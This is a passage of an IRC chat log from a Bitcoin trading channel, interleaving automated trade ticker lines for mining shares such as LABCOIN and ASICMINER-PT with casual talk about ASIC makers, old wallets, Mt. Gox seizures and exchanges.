2.111 BTC [-] Aug 20 01:26:31 [BTCTC] [LABCOIN] 2000 @ 0.00211 = 4.22 BTC [-] Aug 20 01:26:31 oh noes labcoin! Aug 20 01:26:32 [BTCTC] [LABCOIN] 375 @ 0.002101 = 0.7879 BTC [-] Aug 20 01:26:32 [BTCTC] [LABCOIN] 1632 @ 0.0021 = 3.4272 BTC [-] Aug 20 01:27:14 [BTCTC] [DMS.MINING] 86 @ 0.00332 = 0.2855 BTC [+] Aug 20 01:27:50 ;;nethash Aug 20 01:27:50 [BTCTC] [LABCOIN] 2 @ 0.002338 = 0.0047 BTC [+] Aug 20 01:27:50 483482.366754 Aug 20 01:28:02 Nearly half a petahash Aug 20 01:28:18 [BTCTC] [TAT.VIRTUALMINE] 21 @ 0.001203 = 0.0253 BTC [-] Aug 20 01:28:30 Goodbye labcoin, see you at 0 Aug 20 01:28:51 wtf is labcoin? Aug 20 01:29:03 [BTCTC] [LABCOIN] 1 @ 0.002333 BTC [-] Aug 20 01:29:09 That thing Aug 20 01:29:19 Their website says "Proprietary Bitcoin mining ASIC technology" Aug 20 01:29:22 One of the many random "ASIC" developers Aug 20 01:29:31 Yet another ASIC company. Aug 20 01:29:46 BFL must be mining for their customers; no way they'd still have any money left by now Aug 20 01:29:46 hell if BFL could pull off shipping some units anyone can Aug 20 01:30:04 when I get mines its gonna have dust all in it Aug 20 01:30:56 [BTCTC] [LABCOIN] 2 @ 0.002104 = 0.0042 BTC [-] Aug 20 01:30:58 [BTCTC] [LABCOIN] 30 @ 0.002104 = 0.0631 BTC [-] Aug 20 01:31:49 [BTCTC] [LABCOIN] 30 @ 0.002104 = 0.0631 BTC [-] Aug 20 01:31:57 KRS1, They'll call it: "Production residue" Aug 20 01:32:08 As in, residue from producting Bitcoins Aug 20 01:32:10 [BTCTC] [BASIC-MINING] 1 @ 0.29 BTC [+] Aug 20 01:32:20 [BTCTC] [LABCOIN] 14 @ 0.002326 = 0.0326 BTC [+] Aug 20 01:32:20 [BTCTC] [LABCOIN] 85 @ 0.002327 = 0.1978 BTC [+] Aug 20 01:32:21 [BTCTC] [LABCOIN] 30 @ 0.002332 = 0.07 BTC [+] Aug 20 01:32:23 [BTCTC] [LABCOIN] 20 @ 0.002333 = 0.0467 BTC [+] Aug 20 01:32:24 [BTCTC] [LABCOIN] 1 @ 0.002349 BTC [+] Aug 20 01:32:25 [BTCTC] [LABCOIN] 15 @ 0.00235 = 0.0353 BTC [+] Aug 20 01:32:26 [BTCTC] [LABCOIN] 240 @ 0.002429 = 0.583 BTC [+] Aug 20 01:32:27 [BTCTC] [LABCOIN] 1435 @ 0.00243 = 3.4871 BTC [+] Aug 20 01:32:35 [HAVELOCK] [AM100] 1 @ 0.0367 BTC [-] Aug 20 01:32:42 as in fraud Aug 20 01:32:46 or some shit Aug 20 01:32:53 [HAVELOCK] [AM100] 7 @ 0.03666 = 0.2566 BTC [-] Aug 20 01:33:12 [HAVELOCK] [AM100] 1 @ 0.0355 BTC [-] Aug 20 01:33:13 KRS1 you they just ship the dust Aug 20 01:33:48 [BTCTC] [ASICMINER-PT] 1 @ 3.64 BTC [+] Aug 20 01:34:03 arij actually got his BFL. But he had sold his preorder for a massive price so somebody else gets it. Aug 20 01:34:03 f'n bloody hell.. i was in a good mood til now. Aug 20 01:34:12 [HAVELOCK] [AM100] 5 @ 0.0351 = 0.1755 BTC [-] Aug 20 01:34:16 [HAVELOCK] [AM100] 5 @ 0.0351 = 0.1755 BTC [-] Aug 20 01:34:35 [HAVELOCK] [AM100] 5 @ 0.035 = 0.175 BTC [-] Aug 20 01:34:38 [HAVELOCK] [AM100] 3 @ 0.035 = 0.105 BTC [-] Aug 20 01:34:53 I'm always in a good mood. I don't even see from where my BTC is coming from anymore. But I keep having more and more. Aug 20 01:34:57 [BTCTC] [TAT.ASICMINER] 13 @ 0.03675 = 0.4778 BTC [+] Aug 20 01:35:04 lol u sux Aug 20 01:35:19 i looked at some of my old wallets from when i was mining and almost got sick to my stomach. Aug 20 01:35:27 Oh, that's how I get em, right Aug 20 01:35:52 [HAVELOCK] [AM100] 10 @ 0.0349 = 0.349 BTC [-] Aug 20 01:35:56 [HAVELOCK] [AM100] 10 @ 0.0348 = 0.348 BTC [-] Aug 20 01:35:59 [HAVELOCK] [AM100] 50 @ 0.03461 = 1.7305 BTC [-] Aug 20 01:35:59 You had an old wallet? Aug 20 01:36:03 [HAVELOCK] [AM100] 10 @ 0.0346 = 0.346 BTC [-] Aug 20 01:36:07 [HAVELOCK] [AM100] 10 @ 0.03451 = 0.3451 BTC [-] Aug 20 01:36:09 Like from '09 or '10? Aug 20 01:36:10 [HAVELOCK] [AM100] 270 @ 0.0345 = 9.315 BTC [-] Aug 20 01:36:18 '10+ Aug 20 01:36:28 And deleted your privates? Aug 20 01:36:28 and one from '08 '09 with 2400 btc Aug 20 01:36:32 [HAVELOCK] [AM100] 8 @ 0.0345 = 0.276 BTC [-] Aug 20 01:36:33 naw still have it Aug 20 01:36:35 ..? Aug 20 01:36:39 teh big one Aug 20 01:37:42 [BTCTC] [BTC-GROWTH] 1 @ 0.0958 BTC [-] Aug 20 01:37:44 [BTCTC] [BTC-GROWTH] 3 @ 0.0958 = 0.2874 BTC [-] Aug 20 01:38:23 Well then deleted keys to the small one? Aug 20 01:38:37 [HAVELOCK] [HIM] 1 @ 0.207 BTC [+] Aug 20 01:38:48 actually no..i think they all still intact but have 0 bal Aug 20 01:38:52 oh Aug 20 01:39:00 Spent them too early? Aug 20 01:39:09 [BTCTC] [LABCOIN] 30 @ 0.002375 = 0.0713 BTC [-] Aug 20 01:39:11 [BTCTC] [LABCOIN] 85 @ 0.002376 = 0.202 BTC [+] Aug 20 01:39:12 [BTCTC] [LABCOIN] 14 @ 0.002377 = 0.0333 BTC [+] Aug 20 01:39:13 [BTCTC] [LABCOIN] 61 @ 0.002379 = 0.1451 BTC [+] Aug 20 01:39:14 [BTCTC] [LABCOIN] 491 @ 0.00238 = 1.1686 BTC [+] Aug 20 01:39:15 [BTCTC] [LABCOIN] 2 @ 0.002384 = 0.0048 BTC [+] Aug 20 01:39:16 [BTCTC] [LABCOIN] 20 @ 0.002385 = 0.0477 BTC [+] Aug 20 01:39:17 [BTCTC] [LABCOIN] 125 @ 0.002389 = 0.2986 BTC [+] Aug 20 01:39:18 [BTCTC] [LABCOIN] 1000 @ 0.00239 = 2.39 BTC [+] Aug 20 01:39:19 [BTCTC] [LABCOIN] 414 @ 0.002399 = 0.9932 BTC [+] Aug 20 01:39:20 [BTCTC] [LABCOIN] 3231 @ 0.0024 = 7.7544 BTC [+] Aug 20 01:39:21 [BTCTC] [HOSTED-MINING] 1 @ 0.2799 BTC [+] Aug 20 01:39:24 yeh was so worried about making ROI for my gpu farms Aug 20 01:39:46 i still made money but not as much as i could have..didnt want to get greedy Aug 20 01:39:46 I sold thousands of ASICMINER at 0.11 and 696 at 0.4 Aug 20 01:39:55 d'oh Aug 20 01:40:13 the important thing is not to get greedy, because thats when you really lose Aug 20 01:40:18 I would have something like 5'000-10'000 BTC now. Aug 20 01:40:35 Well I'm up at least, still moving up. Aug 20 01:40:48 [BTCTC] [ACTIVEMINING] 10 @ 0.005247 = 0.0525 BTC [+] Aug 20 01:40:57 [BTCTC] [DMS.MINING] 3 @ 0.003328 = 0.01 BTC [+] Aug 20 01:41:04 [HAVELOCK] [HIM] 18 @ 0.207999 = 3.744 BTC [+] Aug 20 01:41:35 [HAVELOCK] [HIM] 20 @ 0.20899999 = 4.18 BTC [+] Aug 20 01:41:54 [BTCTC] [BTC-GROWTH] 1 @ 0.0957 BTC [-] Aug 20 01:42:17 But all the lost opportunities... they hurt so much Aug 20 01:42:27 [HAVELOCK] [XBOND] 921 @ 0.0011789 = 1.0858 BTC [+] Aug 20 01:42:38 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001489 BTC [+] Aug 20 01:42:45 [HAVELOCK] [XBOND] 2000 @ 0.00119 = 2.38 BTC [+] Aug 20 01:42:49 [BTCTC] [HOSTED-MINING] 1 @ 0.2799 BTC [+] Aug 20 01:43:16 perceived opportunity loss is ridiculous Aug 20 01:43:29 wtf, i could have been porking princess diana when she was 19 woe is me Aug 20 01:44:11 [HAVELOCK] [XBOND] 1650 @ 0.0012 = 1.98 BTC [+] Aug 20 01:45:42 [MPEX] [S.MPOE] 6441 @ 0.00083986 = 5.4095 BTC [-] Aug 20 01:46:01 Of course. It's important that it hurts tho and you ponder on past events. See what's good and what is not. Aug 20 01:46:23 Something many apparently are not doing seeing where they invest their coins. Aug 20 01:46:39 20/20 hindsight is a tricky concept to weigh Aug 20 01:47:18 progression : Thickasthieves -> TAT_Investments -> TATI-PR -> ? Aug 20 01:47:19 is gribble down? Aug 20 01:47:27 nope my bad Aug 20 01:47:28 was ok a minute ago Aug 20 01:47:35 hehe, just needed a new name for this device Aug 20 01:47:42 i'm cool now, using linux Aug 20 01:47:51 you weren't using linux before? Aug 20 01:47:53 nope Aug 20 01:47:57 TAT_Investments: took your sweet time Aug 20 01:47:58 that's depressing Aug 20 01:48:15 dont cry Aug 20 01:48:26 Well some with such hindsight look at ASICMINER and then see labcoin/garden/icedrill/activemining and infer things. But there's more to it than that. Aug 20 01:48:29 even mircea_popescu uses linux Aug 20 01:48:32 and he's not even a computer guy Aug 20 01:48:53 [BTCTC] [BTC-GROWTH] 1 @ 0.0999 BTC [+] Aug 20 01:48:54 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [+] Aug 20 01:49:03 mircea_popescu is a wise man Aug 20 01:49:12 ref perceived opportunity Aug 20 01:49:12 i just go with what the women say. Aug 20 01:49:23 don't go too far though.. Aug 20 01:49:42 well the more womenz you got the closer you get to teh truth. Aug 20 01:50:04 i've been up to my balls in some womens and came close to the truth. Aug 20 01:51:20 You were once wholly up into a women. Did you have absolute truth during that short period? Aug 20 01:51:36 [BTCTC] [RSM] 4 @ 0.01001 = 0.04 BTC [-] Aug 20 01:52:10 so say the hindu anyway Aug 20 01:52:28 Really? Interesting Aug 20 01:53:04 [BTCTC] [ASICMINER-PT] 1 @ 3.647 BTC [+] Aug 20 01:53:05 [BTCTC] [ASICMINER-PT] 3 @ 3.65 = 10.95 BTC [+] Aug 20 01:54:14 [BTCTC] [LABCOIN] 20 @ 0.00236 = 0.0472 BTC [-] Aug 20 01:56:21 [BTCTC] [RSM] 50 @ 0.01 = 0.5 BTC [-] Aug 20 01:57:01 [MPEX] [S.MPOE] 859 @ 0.00083986 = 0.7214 BTC [-] Aug 20 01:57:03 [MPEX] [S.MPOE] 1709 @ 0.00083944 = 1.4346 BTC [-] Aug 20 01:57:42 http://i.imgur.com/5T5bdVh.png - They will be accepting Bitcoin soon. Aug 20 01:58:58 [BTCTC] [LABCOIN] 30 @ 0.002363 = 0.0709 BTC [+] Aug 20 01:58:58 [BTCTC] [LABCOIN] 104 @ 0.00236 = 0.2454 BTC [-] Aug 20 01:59:17 [BTCTC] [ASICMINER-PT] 1 @ 3.699 BTC [+] Aug 20 02:02:39 [BTCTC] [LABCOIN] 30 @ 0.00239 = 0.0717 BTC [+] Aug 20 02:02:40 [BTCTC] [LABCOIN] 2 @ 0.002391 = 0.0048 BTC [+] Aug 20 02:02:42 [BTCTC] [LABCOIN] 20 @ 0.002393 = 0.0479 BTC [+] Aug 20 02:02:44 [BTCTC] [LABCOIN] 5 @ 0.002399 = 0.012 BTC [+] Aug 20 02:02:45 [BTCTC] [LABCOIN] 82 @ 0.0024 = 0.1968 BTC [+] Aug 20 02:02:57 [BTCTC] [ASICMINER-PT] 3 @ 3.7 = 11.1 BTC [+] Aug 20 02:03:00 [BTCTC] [ASICMINER-PT] 1 @ 3.71 BTC [+] Aug 20 02:03:02 [BTCTC] [ASICMINER-PT] 1 @ 3.714 BTC [+] Aug 20 02:05:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.0365 = 0.365 BTC [-] Aug 20 02:06:05 [BTCTC] [DMS.MINING] 1 @ 0.00332 BTC [-] Aug 20 02:09:04 [BTCTC] [ASICMINER-PT] 2 @ 3.715 = 7.43 BTC [+] Aug 20 02:09:58 [BTCTC] [ASICMINER-PT] 1 @ 3.718 BTC [+] Aug 20 02:09:58 [BTCTC] [ASICMINER-PT] 2 @ 3.719 = 7.438 BTC [+] Aug 20 02:10:00 [BTCTC] [ASICMINER-PT] 1 @ 3.72 BTC [+] Aug 20 02:13:38 [MPEX] [S.MPOE] 4050 @ 0.00084163 = 3.4086 BTC [+] Aug 20 02:14:09 [BTCTC] [LABCOIN] 20 @ 0.002364 = 0.0473 BTC [-] Aug 20 02:14:10 [BTCTC] [LABCOIN] 430 @ 0.00236 = 1.0148 BTC [-] Aug 20 02:14:52 [BTCTC] [LABCOIN] 30 @ 0.002361 = 0.0708 BTC [+] Aug 20 02:14:53 [BTCTC] [LABCOIN] 6 @ 0.00236 = 0.0142 BTC [-] Aug 20 02:15:25 [BTCTC] [TAT.ASICMINER] 7 @ 0.03707 = 0.2595 BTC [+] Aug 20 02:15:57 [BTCTC] [DMS.MINING] 1 @ 0.00332 BTC [-] Aug 20 02:25:38 [BTCTC] [ACTIVEMINING] 13 @ 0.00528 = 0.0686 BTC [+] Aug 20 02:26:41 [BTCTC] [ACTIVEMINING] 6 @ 0.005312 = 0.0319 BTC [+] Aug 20 02:26:58 [BTCTC] [DMS.MINING] 2 @ 0.00332 = 0.0066 BTC [-] Aug 20 02:27:15 .d Aug 20 02:27:16 50810339.04828 | Next Diff in 918 blocks | Estimated Change: 22.5900% in 4d 22h 24m 46s Aug 20 02:27:38 [BTCTC] [ACTIVEMINING] 1 @ 0.005311 BTC [-] Aug 20 02:28:03 [BTCTC] [ACTIVEMINING] 58 @ 0.005313 = 0.3082 BTC [+] Aug 20 02:29:34 [BTCTC] [DMS.MINING] 37 @ 0.003328 = 0.1231 BTC [+] Aug 20 02:30:27 [BTCTC] [TAT.ASICMINER] 20 @ 0.03704 = 0.7408 BTC [-] Aug 20 02:32:03 [BTCTC] [ASICMINER-PT] 1 @ 3.673 BTC [-] Aug 20 02:32:05 [BTCTC] [ASICMINER-PT] 1 @ 3.672 BTC [-] Aug 20 02:34:10 Owwww..is someone's butt hurt? Aug 20 02:34:13 http://gigaom.com/2013/08/19/feds-seized-2-9m-in-bitcoin-funds-from-mt-gox-court-docs-show Aug 20 02:34:17 Feds seized $2.9M in Bitcoin funds from Mt. Gox, court docs show — Tech News and Analysis Aug 20 02:34:26 [BTCTC] [TAT.ASICMINER] 27 @ 0.03633 = 0.9809 BTC [-] Aug 20 02:34:27 [BTCTC] [TAT.ASICMINER] 35 @ 0.03632 = 1.2712 BTC [-] Aug 20 02:34:29 [BTCTC] [TAT.ASICMINER] 50 @ 0.03632 = 1.816 BTC [-] Aug 20 02:34:30 [BTCTC] [TAT.ASICMINER] 7 @ 0.0363 = 0.2541 BTC [-] Aug 20 02:34:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.03615 = 0.1085 BTC [-] Aug 20 02:34:32 [BTCTC] [TAT.ASICMINER] 50 @ 0.03613 = 1.8065 BTC [-] Aug 20 02:34:33 [BTCTC] [TAT.ASICMINER] 22 @ 0.03613 = 0.7949 BTC [-] Aug 20 02:34:34 [BTCTC] [TAT.ASICMINER] 7 @ 0.03612 = 0.2528 BTC [-] Aug 20 02:34:34 lol fresh off da prss Aug 20 02:35:02 although I heard that yesterday from longshot Aug 20 02:36:57 [BTCTC] [RSM] 15 @ 0.009702 = 0.1455 BTC [-] Aug 20 02:36:57 [BTCTC] [RSM] 113 @ 0.0097 = 1.0961 BTC [-] Aug 20 02:39:44 [HAVELOCK] [XBOND] 1 @ 0.0011011 BTC [-] Aug 20 02:40:03 [HAVELOCK] [XBOND] 1 @ 0.0011 BTC [-] Aug 20 02:40:09 [BTCTC] [LABCOIN] 30 @ 0.002364 = 0.0709 BTC [+] Aug 20 02:40:10 [HAVELOCK] [XBOND] 2 @ 0.0010922 = 0.0022 BTC [-] Aug 20 02:40:12 [BTCTC] [LABCOIN] 3 @ 0.002365 = 0.0071 BTC [+] Aug 20 02:40:13 [BTCTC] [LABCOIN] 20 @ 0.002365 = 0.0473 BTC [+] Aug 20 02:40:15 [BTCTC] [LABCOIN] 2 @ 0.00237 = 0.0047 BTC [+] Aug 20 02:40:16 [BTCTC] [LABCOIN] 38 @ 0.002389 = 0.0908 BTC [+] Aug 20 02:40:17 [BTCTC] [LABCOIN] 309 @ 0.00239 = 0.7385 BTC [+] Aug 20 02:40:17 [BTCTC] [LABCOIN] 189 @ 0.002399 = 0.4534 BTC [+] Aug 20 02:40:18 [BTCTC] [LABCOIN] 1 @ 0.0024 BTC [+] Aug 20 02:40:19 [BTCTC] [LABCOIN] 33 @ 0.0024 = 0.0792 BTC [+] Aug 20 02:40:21 [HAVELOCK] [XBOND] 25 @ 0.001092 = 0.0273 BTC [-] Aug 20 02:40:23 [HAVELOCK] [XBOND] 5 @ 0.00109001 = 0.0055 BTC [-] Aug 20 02:41:12 chicken feed Aug 20 02:43:26 [HAVELOCK] [XBOND] 340 @ 0.00106521 = 0.3622 BTC [-] Aug 20 02:44:29 lol ok dude Aug 20 02:44:30 [BTCTC] [ACTIVEMINING] 58 @ 0.005312 = 0.3081 BTC [-] Aug 20 02:48:42 [BTCTC] [TAT.ASICMINER] 7 @ 0.03612 = 0.2528 BTC [-] Aug 20 02:49:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.03687 BTC [+] Aug 20 02:51:59 [HAVELOCK] [CFIG] 18 @ 0.15 = 2.7 BTC Aug 20 02:56:59 [BTCTC] [LABCOIN] 20 @ 0.002346 = 0.0469 BTC [-] Aug 20 02:57:00 [BTCTC] [LABCOIN] 92 @ 0.002399 = 0.2207 BTC [+] Aug 20 02:57:01 [BTCTC] [LABCOIN] 1481 @ 0.0024 = 3.5544 BTC [+] Aug 20 02:58:15 [BTCTC] [LABCOIN] 500 @ 0.0024 = 1.2 BTC [+] Aug 20 02:58:42 [BTCTC] [LABCOIN] 287 @ 0.0024 = 0.6888 BTC [+] Aug 20 02:59:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.03675 = 0.0735 BTC [-] Aug 20 03:08:20 [BTCTC] [DMS.MINING] 25 @ 0.00329 = 0.0823 BTC [-] Aug 20 03:08:21 [BTCTC] [DMS.MINING] 25 @ 0.00329 = 0.0823 BTC [-] Aug 20 03:08:34 [BTCTC] [ACTIVEMINING] 190 @ 0.0053 = 1.007 BTC [-] Aug 20 03:11:13 [BTCTC] [DMS.SELLING] 1 @ 0.01775 BTC [+] Aug 20 03:13:08 [MPEX] [S.MPOE] 3891 @ 0.00083944 = 3.2663 BTC [-] Aug 20 03:18:10 loller. Aug 20 03:18:12 [BTCTC] [LABCOIN] 6 @ 0.002404 = 0.0144 BTC [+] Aug 20 03:18:50 [BTCTC] [LABCOIN] 30 @ 0.002399 = 0.072 BTC [-] Aug 20 03:18:51 [BTCTC] [LABCOIN] 80 @ 0.0024 = 0.192 BTC [+] Aug 20 03:18:59 [BTCTC] [LABCOIN] 30 @ 0.0024 = 0.072 BTC [+] Aug 20 03:19:00 [BTCTC] [LABCOIN] 5 @ 0.002403 = 0.012 BTC [+] Aug 20 03:19:01 [BTCTC] [LABCOIN] 20 @ 0.002405 = 0.0481 BTC [+] Aug 20 03:19:03 [BTCTC] [LABCOIN] 287 @ 0.002427 = 0.6965 BTC [+] Aug 20 03:19:04 [BTCTC] [LABCOIN] 50 @ 0.002428 = 0.1214 BTC [+] Aug 20 03:20:13 [BTCTC] [LABCOIN] 30 @ 0.002428 = 0.0728 BTC [+] Aug 20 03:20:23 [BTCTC] [ACTIVEMINING] 86 @ 0.00524 = 0.4506 BTC [-] Aug 20 03:20:56 [BTCTC] [LABCOIN] 100 @ 0.002428 = 0.2428 BTC [+] Aug 20 03:23:35 [BTCTC] [HOSTED-MINING] 10 @ 0.2799 = 2.799 BTC [+] Aug 20 03:23:37 [BTCTC] [HOSTED-MINING] 20 @ 0.2799 = 5.598 BTC [+] Aug 20 03:23:38 [BTCTC] [HOSTED-MINING] 25 @ 0.2799 = 6.9975 BTC [+] Aug 20 03:24:05 [BTCTC] [TAT.ASICMINER] 5 @ 0.03662 = 0.1831 BTC [-] Aug 20 03:24:18 [BTCTC] [LABCOIN] 86 @ 0.002428 = 0.2088 BTC [+] Aug 20 03:24:23 lol someone bought my xbond at a 19% premium Aug 20 03:24:30 never thought it would actually happen Aug 20 03:25:30 you're a daytrader nao. Aug 20 03:26:13 not really in that case Aug 20 03:26:48 [BTCTC] [BASIC-MINING] 1 @ 0.289 BTC [-] Aug 20 03:27:20 but I have been a minutes-trader against my will. bid filled, set up a much higher sell order, it sells :| Aug 20 03:28:08 I'm not sure if a bot could do it instead Aug 20 03:29:41 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 20 03:32:19 [BTCTC] [LABCOIN] 10 @ 0.0024 = 0.024 BTC [-] Aug 20 03:32:54 [BTCTC] [LABCOIN] 52 @ 0.002428 = 0.1263 BTC [+] Aug 20 03:33:05 [BTCTC] [LABCOIN] 490 @ 0.002428 = 1.1897 BTC [+] Aug 20 03:33:06 [BTCTC] [LABCOIN] 1510 @ 0.002429 = 3.6678 BTC [+] Aug 20 03:35:08 [BTCTC] [RSM] 2 @ 0.01093 = 0.0219 BTC [+] Aug 20 03:36:20 [BTCTC] [DMS.SELLING] 53 @ 0.01776 = 0.9413 BTC [+] Aug 20 03:36:21 [BTCTC] [DMS.SELLING] 65 @ 0.01777 = 1.1551 BTC [+] Aug 20 03:36:26 prolly not Aug 20 03:36:30 bots don't have any luck. Aug 20 03:36:45 [BTCTC] [ACTIVEMINING] 27 @ 0.0052 = 0.1404 BTC [-] Aug 20 03:36:58 [BTCTC] [LABCOIN] 126 @ 0.002428 = 0.3059 BTC [-] Aug 20 03:36:59 [BTCTC] [LABCOIN] 990 @ 0.002429 = 2.4047 BTC [+] Aug 20 03:37:00 [BTCTC] [LABCOIN] 23 @ 0.00243 = 0.0559 BTC [+] Aug 20 03:37:30 [BTCTC] [LABCOIN] 861 @ 0.002432 = 2.094 BTC [+] Aug 20 03:37:40 [BTCTC] [ACTIVEMINING] 1636 @ 0.0052 = 8.5072 BTC [-] Aug 20 03:37:59 [BTCTC] [LABCOIN] 389 @ 0.002432 = 0.946 BTC [+] Aug 20 03:38:09 [BTCTC] [ASICMINER-PT] 1 @ 3.692 BTC [+] Aug 20 03:38:11 [BTCTC] [ASICMINER-PT] 1 @ 3.691 BTC [-] Aug 20 03:38:12 [BTCTC] [ASICMINER-PT] 1 @ 3.671 BTC [-] Aug 20 03:38:12 [BTCTC] [ASICMINER-PT] 1 @ 3.67 BTC [-] Aug 20 03:38:14 [BTCTC] [LABCOIN] 1 @ 0.002433 BTC [+] Aug 20 03:38:39 [BTCTC] [BASIC-MINING] 2 @ 0.28 = 0.56 BTC [-] Aug 20 03:38:41 [BTCTC] [BASIC-MINING] 1 @ 0.28 BTC [-] Aug 20 03:38:42 [BTCTC] [BASIC-MINING] 2 @ 0.276 = 0.552 BTC [-] Aug 20 03:38:43 [BTCTC] [BASIC-MINING] 2 @ 0.2751 = 0.5502 BTC [-] Aug 20 03:38:44 [BTCTC] [BASIC-MINING] 6 @ 0.275 = 1.65 BTC [-] Aug 20 03:38:54 [BTCTC] [LABCOIN] 154 @ 0.002432 = 0.3745 BTC [-] Aug 20 03:38:56 [BTCTC] [LABCOIN] 1846 @ 0.002433 = 4.4913 BTC [+] Aug 20 03:39:19 [BTCTC] [COGNITIVE] 9 @ 0.3276 = 2.9484 BTC [+] Aug 20 03:39:32 [BTCTC] [LABCOIN] 1250 @ 0.002432 = 3.04 BTC [-] Aug 20 03:39:52 [BTCTC] [ACTIVEMINING] 598 @ 0.005161 = 3.0863 BTC [-] Aug 20 03:39:53 [BTCTC] [TAT.ASICMINER] 43 @ 0.03612 = 1.5532 BTC [-] Aug 20 03:39:54 [BTCTC] [TAT.ASICMINER] 47 @ 0.0361 = 1.6967 BTC [-] Aug 20 03:40:04 hello, has anyone done a proper comparison of the different securities. Like original company valuation, current marketcaps, APR per share, etc? Aug 20 03:40:07 [BTCTC] [ASICMINER-PT] 1 @ 3.671 BTC [+] Aug 20 03:40:23 No, no one has ever done that. Aug 20 03:41:02 [BTCTC] [LABCOIN] 1500 @ 0.002432 = 3.648 BTC [-] Aug 20 03:41:10 looking around on bitcointalk Aug 20 03:42:03 https://bitcointalk.org/index.php?topic=267682.0 Aug 20 03:42:08 Valuations of Mining Shares on Bitfunder Aug 20 03:42:39 so many IPOs, so little XBT. Aug 20 03:43:43 anonce: easy. IPO your fund! Aug 20 03:44:08 [BTCTC] [LABCOIN] 2 @ 0.002432 = 0.0049 BTC [-] Aug 20 03:45:14 [BTCTC] [ACTIVEMINING] 398 @ 0.005161 = 2.0541 BTC [-] Aug 20 03:45:40 [BTCTC] [ASICMINER-PT] 1 @ 3.744 BTC [+] Aug 20 03:46:16 [BTCTC] [LABCOIN] 7248 @ 0.002432 = 17.6271 BTC [-] Aug 20 03:46:50 [BTCTC] [LABCOIN] 213 @ 0.00243 = 0.5176 BTC [-] Aug 20 03:46:52 [BTCTC] [ASICMINER-PT] 1 @ 3.745 BTC [+] Aug 20 03:47:47 [BTCTC] [LABCOIN] 500 @ 0.002433 = 1.2165 BTC [+] Aug 20 03:48:38 [BTCTC] [LABCOIN] 125 @ 0.002433 = 0.3041 BTC [+] Aug 20 03:54:16 [BTCTC] [LABCOIN] 20 @ 0.002404 = 0.0481 BTC [-] Aug 20 03:54:46 [BTCTC] [BFMINES] 1 @ 0.001201 BTC [-] Aug 20 03:54:47 [BTCTC] [BFMINES] 2 @ 0.0012 = 0.0024 BTC [-] Aug 20 03:54:48 [BTCTC] [BFMINES] 5 @ 0.00111 = 0.0056 BTC [-] Aug 20 03:54:49 [BTCTC] [BFMINES] 1 @ 0.0011 BTC [-] Aug 20 03:56:21 [BTCTC] [LABCOIN] 20 @ 0.002403 = 0.0481 BTC [-] Aug 20 03:56:22 [BTCTC] [LABCOIN] 625 @ 0.002303 = 1.4394 BTC [-] Aug 20 03:56:48 [BTCTC] [LABCOIN] 30 @ 0.002432 = 0.073 BTC [+] Aug 20 03:56:49 [BTCTC] [LABCOIN] 4 @ 0.002433 = 0.0097 BTC [+] Aug 20 03:57:22 VanCleef afaik the closest to that'd be http://trilema.com/2013/the-best-investments-in-the-history-of-bitcoin/ and it;s out of date. Aug 20 03:58:49 [BTCTC] [TAT.ASICMINER] 7 @ 0.03656 = 0.2559 BTC [+] Aug 20 03:58:50 [BTCTC] [TAT.ASICMINER] 23 @ 0.03657 = 0.8411 BTC [+] Aug 20 03:59:00 yeah, i've read it before :) Aug 20 03:59:10 [BTCTC] [BASIC-MINING] 1 @ 0.2761 BTC [+] Aug 20 03:59:18 i mighta lil custom thing together for the things i've invested in Aug 20 04:01:03 [BTCTC] [LABCOIN] 30 @ 0.00232 = 0.0696 BTC [-] Aug 20 04:01:03 [BTCTC] [LABCOIN] 85 @ 0.002319 = 0.1971 BTC [-] Aug 20 04:04:23 no wonder mtgox has been slow pay Aug 20 04:04:42 2.9 million in the dwolla acct Aug 20 04:04:45 [BTCTC] [LABCOIN] 30 @ 0.002333 = 0.07 BTC [+] Aug 20 04:04:45 [BTCTC] [LABCOIN] 14 @ 0.002332 = 0.0326 BTC [-] Aug 20 04:04:47 [BTCTC] [LABCOIN] 85 @ 0.002332 = 0.1982 BTC [-] Aug 20 04:04:48 [BTCTC] [LABCOIN] 2 @ 0.002315 = 0.0046 BTC [-] Aug 20 04:04:49 [BTCTC] [LABCOIN] 20 @ 0.002314 = 0.0463 BTC [-] Aug 20 04:04:50 [BTCTC] [LABCOIN] 625 @ 0.002303 = 1.4394 BTC [-] Aug 20 04:05:36 [BTCTC] [LABCOIN] 30 @ 0.002303 = 0.0691 BTC [-] Aug 20 04:05:37 [BTCTC] [LABCOIN] 20 @ 0.002303 = 0.0461 BTC [-] Aug 20 04:05:39 [BTCTC] [LABCOIN] 735 @ 0.002302 = 1.692 BTC [-] Aug 20 04:06:11 they need to work around that problem though if they want to stop hemorraging customers to bitstamp Aug 20 04:06:46 coinbase is actually better, no reason to use gox anymore Aug 20 04:06:58 [MPEX] [S.MPOE] 3359 @ 0.00083833 = 2.816 BTC [-] Aug 20 04:07:00 [MPEX] [S.MPOE] 2550 @ 0.00084034 = 2.1429 BTC [+] Aug 20 04:07:01 [MPEX] [S.MPOE] 267 @ 0.00084163 = 0.2247 BTC [+] Aug 20 04:07:39 [BTCTC] [ASICMINER-PT] 1 @ 3.742 BTC [-] Aug 20 04:07:46 i have been wary of bitstamp since they got in so deep with ripple Aug 20 04:08:34 coinbase isn't a true exchange though Aug 20 04:08:47 it's awesome, i use it, but not really a trade platform Aug 20 04:08:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.03669 BTC [+] Aug 20 04:09:46 well, neither was fast cash but they still were awesome Aug 20 04:10:44 [MPEX] [S.MPOE] 4432 @ 0.00084179 = 3.7308 BTC [+] Aug 20 04:10:52 ya pity thgey closed up shop Aug 20 04:11:00 tho the guy was saying they're about to reopen Aug 20 04:13:03 that will restore a major avenue , that was well run and needed. Aug 20 04:15:40 [BTCTC] [BTC-GROWTH] 1 @ 0.0999 BTC [-] Aug 20 04:21:21 [BTCTC] [LABCOIN] 20 @ 0.002329 = 0.0466 BTC [+] Aug 20 04:21:23 [BTCTC] [LABCOIN] 60 @ 0.002329 = 0.1397 BTC [+] Aug 20 04:21:24 [BTCTC] [LABCOIN] 3000 @ 0.002328 = 6.984 BTC [-] Aug 20 04:21:25 [BTCTC] [LABCOIN] 4265 @ 0.002302 = 9.818 BTC [-] Aug 20 04:21:26 [BTCTC] [LABCOIN] 